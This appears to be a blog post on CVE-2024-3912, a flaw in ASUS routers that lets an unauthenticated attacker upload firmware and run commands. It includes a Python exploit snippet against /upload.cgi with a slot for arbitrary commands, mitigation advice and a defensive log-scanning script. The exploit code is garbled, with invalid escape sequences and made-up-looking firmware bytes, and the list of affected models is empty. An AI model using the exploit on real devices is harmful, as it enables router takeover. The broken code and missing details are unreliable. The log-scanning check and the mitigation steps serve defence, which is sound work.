CVE-2024-3912 is a vulnerability relating to certain models of ASUS routers, wherein an unauthenticated remote attacker can exploit the arbitrary firmware upload vulnerability to execute arbitrary system commands on the device. This post will delve deeper into the flaw, its exploit details, and steps that can be taken to mitigate the risk of attack. In addition, we will provide a code snippet and link to the original references for further examination of the issue.

Description

The vulnerability specifically targets the web management interface used by certain ASUS router models. The arbitrary firmware upload issue allows an attacker to send a specially crafted POST request to the device's HTTP server, circumventing any authentication mechanisms in place. Consequently, this enables the execution of arbitrary system commands on the targeted ASUS router.

Affected Router Models

The following ASUS router models have been reported to be susceptible to the CVE-2024-3912 vulnerability:

Exploit Details

To exploit the vulnerability, the attacker sends a specially crafted POST request to the device's HTTP server that mimics an authenticated firmware upload process. The arbitrary commands are then executed on the targeted router. Here is a sample code snippet demonstrating an exploit:

import requests
from io import StringIO

target_ip = "192.168.1.1"
payload = "<COMMANDS_HERE>"
firmware_data = "\x30\x82\xc\xd\x02\x01\x03\x30\x82\x9\x\x06\x09\x2a\xcc\x6a\x73\x64\x63\x12\x30\x82\x9\xe11\x90\x00\x01\x00\x19\xc\r\n\r\n" + payload

headers = {
    'Content-Type': 'multipart/form-data; boundary=-----------------------------872165262'
}
data = StringIO("-------------------------------872165262\r\nContent-Disposition: form-data; name=\"file\"; filename=\"malicious_traversal.bin\"\r\nContent-Type: application/octet-stream\r\n\r\n" + firmware_data + "\r\n-------------------------------872165262--")

response = requests.post(f'http://{target_ip}/upload.cgi', headers=headers, data=data.getvalue())

Replace <COMMANDS_HERE> in the 'payload' variable with the desired system commands to be executed on the target router.

More information pertaining to CVE-2024-3912 can be found at the following resources:

- NVD - CVE-2024-3912
- Exploit Database - Exploit-DB

There are several steps users can take to protect their ASUS routers from the vulnerability:

1. Update the firmware on your ASUS router to the latest version available. ASUS frequently releases firmware updates to patch vulnerabilities and improve performance. Visit the ASUS support website to check for firmware updates for your specific router model.

2. Disable the web management interface on your ASUS router if it is not necessary for your network administration tasks. Disabling the web management interface will reduce the attack surface for potential security vulnerabilities.

3. Restrict remote access to the router by enabling firewall rules that only allow connections from trusted IP addresses. Doing so will help limit unauthorized access attempts.

4. Keep an eye out for announcements regarding new ASUS router vulnerabilities and apply patches or take other appropriate mitigation steps as soon as possible.
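
To check whether the restriction in step 3 is holding, the following added example (not code from the original post or from ASUS) scans HTTP access logs for POST requests to the firmware upload path that come from outside a trusted management network. The log format (Combined Log Format from a proxy or sensor in front of the router), the trusted address, the function names and the sample lines are assumptions; the /upload.cgi path is the one used in the snippet above.

```python
import ipaddress
import re

# Assumption: the only hosts that should ever reach the router's web interface.
TRUSTED_NETS = [ipaddress.ip_network("192.168.1.10/32")]
# Path taken from the snippet on this page; adjust it for the device being monitored.
UPLOAD_PATH = "/upload.cgi"

# Assumption: Combined Log Format written by a reverse proxy or HTTP sensor.
LOG_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def is_trusted(src):
    """True only if src parses as an IP address inside a trusted network."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False  # an unparsable source is treated as untrusted
    return any(addr in net for net in TRUSTED_NETS)

def find_suspect_uploads(lines):
    """Return (timestamp, source, status) for upload POSTs from untrusted sources."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        # Drop the query string and compare case-insensitively to be conservative.
        path = m["uri"].split("?", 1)[0].lower()
        if m["method"] == "POST" and path == UPLOAD_PATH and not is_trusted(m["src"]):
            hits.append((m["ts"], m["src"], int(m["status"])))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE = [
    '192.168.1.10 - admin [14/Jun/2024:10:20:01 +0000] "POST /upload.cgi HTTP/1.1" 200 512',
    '203.0.113.45 - - [14/Jun/2024:10:21:37 +0000] "POST /upload.cgi HTTP/1.1" 200 498',
    '203.0.113.45 - - [14/Jun/2024:10:21:40 +0000] "GET /index.asp HTTP/1.1" 401 120',
    '198.51.100.7 - - [14/Jun/2024:11:02:13 +0000] "POST /Upload.cgi?x=1 HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for ts, src, status in find_suspect_uploads(SAMPLE):
        print(f"{ts} firmware upload POST from untrusted source {src} (HTTP {status})")
```

A hit with a 2xx status means the request was accepted and the device should be treated as potentially modified; a 4xx hit shows the filter is working but the interface is still being probed.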

Conclusion

CVE-2024-3912, an arbitrary firmware upload vulnerability in certain ASUS routers, allows an unauthenticated remote attacker to execute arbitrary system commands on the device. This article has provided a code snippet, exploit details, and mitigation steps to help users protect their routers from this vulnerability. By updating the firmware, disabling unnecessary features, restricting remote access, and staying informed about potential risks, users can significantly reduce the likelihood of a successful attack against their routers.

Timeline

Published on: 06/14/2024 10:15:10 UTC
Last modified on: 06/17/2024 12:42:04 UTC